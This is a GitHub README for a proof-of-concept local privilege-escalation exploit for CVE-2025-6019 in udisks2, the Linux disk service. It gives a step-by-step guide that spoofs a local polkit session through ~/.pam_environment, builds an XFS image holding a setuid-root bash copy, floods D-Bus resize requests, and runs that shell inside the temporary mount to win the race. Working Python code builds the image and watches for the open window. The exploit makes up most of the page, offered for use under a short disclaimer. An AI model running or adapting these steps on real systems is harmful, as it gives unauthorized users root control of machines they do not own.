JM00NJ/CVE-2025-6019-udisks2-XFS-Resize-TOCTOU-Privilege-Escalation

CVE-2025-6019: udisks2 XFS Resize TOCTOU Privilege Escalation

This repository contains a Proof of Concept (PoC) for CVE-2025-6019, a race condition (TOCTOU) in udisks2 that allows a local user to escalate to root via XFS filesystem resizing: the daemon mounts a user-supplied XFS image on a temporary mount point while resizing it, and a SUID root binary inside that image can be executed during the window before the mount is hardened.

🎯 Target Environments & Compatibility

This exploit is intended to work on any Linux system that meets the following criteria:

  • Vulnerable service: udisks2, reachable over D-Bus by the unprivileged user.
  • Filesystem tool: xfsprogs installed (specifically mkfs.xfs, which is needed to build the image).
  • Architecture: agnostic (x86, x86-64, ARM, etc.); nothing in the PoC is architecture-specific.

✅ Tested Environments

The exploit has been verified on the following configuration:

  • OS: openSUSE Leap 15.6
  • Kernel: Linux 6.4.0-150600.23.65-default (x86_64)
  • Virtualization: VMware
  • Target: udisks2 (via D-Bus)

Note: The weapon.py script automatically sets up the environment PATH to locate mkfs.xfs, which typically lives in a sbin directory that is not on an unprivileged user's PATH.

🛡️ The Role of the Protofile

The exploitation requires a specially crafted XFS image created with a protofile. A protofile is a plain-text template that mkfs.xfs (-p <protofile>) uses to populate the new filesystem: each entry names a file, its mode (including the setuid and setgid flags), the owner uid/gid, and the source path to copy the contents from. Because mkfs.xfs only writes bytes into an image file, no root privileges are needed to produce an entry owned by uid 0 with the setuid bit set; the SUID root binary (pwnbash) is simply baked into the image's metadata. That bit only becomes dangerous once a privileged process mounts the image without nosuid, which is what udisks2 does on its temporary mount point during the resize.
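To make the protofile format concrete, here is an added example (written for this page, not the repository's weapon.py) that renders a template with a setuid-root entry, decodes the mode field back into inode permission bits so the template can be checked before use, and invokes mkfs.xfs when it is installed. The entry name pwnbash, the source /bin/bash, the image path and the 512 MiB size are assumptions for illustration.

```python
import os
import shutil
import stat
import subprocess

ROOT_UID, ROOT_GID = 0, 0  # owner baked into the image; no privileges needed


def proto_mode(kind="-", perms=0o755, setuid=False, setgid=False):
    """Encode one protofile mode field: type char ('-' file, 'd' dir, 'b', 'c',
    'l', 'p'), then 'u'/'-' for setuid, 'g'/'-' for setgid, then three octal
    permission digits, e.g. '-u-755' for a setuid regular file."""
    if len(kind) != 1 or kind not in "-dbclp":
        raise ValueError(f"unknown entry type {kind!r}")
    return f"{kind}{'u' if setuid else '-'}{'g' if setgid else '-'}{perms & 0o777:03o}"


def proto_mode_to_st_mode(mode):
    """Decode a protofile mode field into the permission bits (including
    setuid/setgid) the inode will carry, e.g. '-u-755' -> 0o4755."""
    if len(mode) != 6:
        raise ValueError(f"bad mode field {mode!r}")
    bits = int(mode[3:], 8)
    if mode[1] == "u":
        bits |= stat.S_ISUID
    if mode[2] == "g":
        bits |= stat.S_ISGID
    return bits


def build_protofile(entries):
    """Render an mkfs.xfs protofile for regular files in the root directory.

    entries: list of (name, mode, uid, gid, source_path). The first two header
    lines (boot file name, size/inode counts) are ignored by mkfs.xfs, the
    third line describes the root directory, and '$' closes that directory."""
    lines = ["dummy", "0 0", f"{proto_mode('d', 0o755)} {ROOT_UID} {ROOT_GID}"]
    for name, mode, uid, gid, source in entries:
        if mode[0] != "-":
            raise ValueError("this helper only emits regular files")
        lines.append(f"{name} {mode} {uid} {gid} {source}")
    lines.append("$")
    return "\n".join(lines) + "\n"


def find_mkfs_xfs():
    """Locate mkfs.xfs even when the sbin directories are not on PATH."""
    for directory in ("/usr/sbin", "/sbin", "/usr/local/sbin"):
        candidate = os.path.join(directory, "mkfs.xfs")
        if os.access(candidate, os.X_OK):
            return candidate
    return shutil.which("mkfs.xfs")


def make_image(image_path, proto_text, size_mb=512):
    """Write the protofile and build the XFS image as an ordinary user.
    Returns the mkfs.xfs exit status, or None if mkfs.xfs is not installed.
    Recent xfsprogs refuse filesystems smaller than 300 MiB, hence the default."""
    mkfs = find_mkfs_xfs()
    if mkfs is None:
        return None
    proto_path = image_path + ".proto"
    with open(proto_path, "w") as fh:
        fh.write(proto_text)
    with open(image_path, "wb") as fh:  # sparse file of the requested size
        fh.truncate(size_mb * 1024 * 1024)
    return subprocess.run([mkfs, "-f", "-p", proto_path, image_path]).returncode


if __name__ == "__main__":
    # Assumed entry: a copy of /bin/bash named pwnbash, root-owned, mode 4755.
    template = build_protofile([("pwnbash", proto_mode(setuid=True), 0, 0, "/bin/bash")])
    print(template)
    print(oct(proto_mode_to_st_mode(proto_mode(setuid=True))))  # 0o4755
    print("mkfs.xfs exit status:", make_image("/tmp/evil.img", template))
```

Checking the decoded mode before building is worth the two lines: a typo such as `--u755` (setgid in the setuid column) silently produces a file that will never grant root.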

🚀 Exploitation Guide (Manual Method)

Step 1: Bypass Polkit Restrictions

Standard users in remote sessions (SSH, Docker) are restricted from using udisks2, because polkit only grants the relevant actions to users with an active local seat. Run this script to spoof a local session (seat0):

python3 bypass.py

The script writes the spoofed session variables to ~/.pam_environment, which is read at login, so start a new session afterwards for the change to take effect.

Step 2: Weaponize (Image Creation)

Generate the SUID image using weapon.py. This script uses the XFS protofile to embed a shell (pwnbash) owned by root with mode 4755:

python3 weapon.py

Step 3: Trigger the Race

Execute trigger.sh to begin flooding udisks2 with D-Bus resize requests for the image. Each request forces the daemon to mount the image on a freshly created temporary mount point of the form /tmp/blockdev.XXXXXX:

chmod +x trigger.sh
./trigger.sh

Step 4: Win the Race (Manual Execution)

Since automated scripts can be unstable in resource-constrained environments, the manual method is recommended.

Monitor /tmp for temporary mount points:

watch -n 0.1 "ls -la /tmp"

Identify the target: look for a blockdev.* directory whose permissions let other users enter it (e.g. drwxr-xr-x) instead of the hardened default drwx------.

Execute the payload: once identified, change into the directory and run the shell. The -p flag tells bash not to drop the effective uid it inherited from the setuid bit:

cd /tmp/blockdev.Q797J3   # example directory name
./pwnbash -p

Result: if the execution happens within the race window (after the image is mounted but before the nosuid flag is applied), you are granted a root shell; confirm with id -u, which prints 0.
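The `watch` loop above tells you a directory appeared, but not whether the window is actually open: the directory may be enterable yet not mounted yet, or mounted already with nosuid. The following added example (not part of this repository) polls /tmp for blockdev.* directories and classifies each one from its permissions and from /proc/self/mountinfo, where nosuid/nodev appear in the per-mount options field. It only reports; it does not execute anything. On a patched system it should never print "mounted-suid-honoured", which also makes it a quick check for defenders. The regex for mkdtemp-style names and the sample mountinfo lines are constructed for illustration.

```python
import os
import re
import stat
import time

BLOCKDEV_DIR = re.compile(r"^blockdev\.[A-Za-z0-9]{6}$")  # mkdtemp-style name (assumed)


def parse_mountinfo(text):
    """Map mount point -> per-mount options from /proc/self/mountinfo text.
    Field 5 is the mount point and field 6 the per-mount options; nosuid and
    nodev live there, not in the superblock options after the ' - ' separator."""
    mounts = {}
    for line in text.splitlines():
        if " - " not in line:
            continue
        left, right = line.split(" - ", 1)
        lf, rf = left.split(), right.split()
        if len(lf) < 6 or len(rf) < 2:
            continue
        mount_point = lf[4].replace("\\040", " ")  # mountinfo escapes spaces
        mounts[mount_point] = {"opts": set(lf[5].split(",")), "fstype": rf[0]}
    return mounts


def dir_is_traversable_by_others(st_mode):
    """drwxr-xr-x lets any user enter; the hardened drwx------ does not."""
    return stat.S_ISDIR(st_mode) and bool(st_mode & stat.S_IXOTH)


def classify(path, st_mode, mounts):
    """Describe what an unprivileged user would find at a udisks temp mount point."""
    if not dir_is_traversable_by_others(st_mode):
        return "closed-dir"
    info = mounts.get(path)
    if info is None:
        return "open-dir-not-mounted"
    if "nosuid" in info["opts"]:
        return "mounted-nosuid"
    return "mounted-suid-honoured"


def scan(tmpdir="/tmp", mountinfo_text=None):
    """Return {path: state} for every blockdev.* directory currently in tmpdir."""
    if mountinfo_text is None:
        with open("/proc/self/mountinfo") as fh:
            mountinfo_text = fh.read()
    mounts = parse_mountinfo(mountinfo_text)
    results = {}
    try:
        names = os.listdir(tmpdir)
    except OSError:
        return results
    for name in names:
        if not BLOCKDEV_DIR.match(name):
            continue
        path = os.path.join(tmpdir, name)
        try:
            st = os.lstat(path)
        except OSError:
            continue  # already removed: that window has closed
        results[path] = classify(path, st.st_mode, mounts)
    return results


if __name__ == "__main__":
    # Poll about as fast as 'watch -n 0.1' and print each (path, state) once.
    seen = set()
    while True:
        for path, state in scan().items():
            if (path, state) not in seen:
                seen.add((path, state))
                print(f"{path}: {state}")
        time.sleep(0.1)
```

Because the poll reads mountinfo once per pass, a mount can still flip state between the stat and the parse; treat "mounted-suid-honoured" as evidence the window exists on that build, not as a guarantee it is still open when you act on it.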

📁 File Descriptions

bypass.py: Configuration script to spoof a local session (seat0) and bypass Polkit restrictions via ~/.pam_environment.

weapon.py: SUID Image generator using the XFS Protofile template.

trigger.sh: D-Bus race condition trigger for udisks2 filesystem resizing.

For a detailed breakdown: 👉 NetaCoding - https://netacoding.blogspot.com/2026/02/new-vulnerability-analysis-udisks2-xfs.html

⚠️ Disclaimer

This project is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.
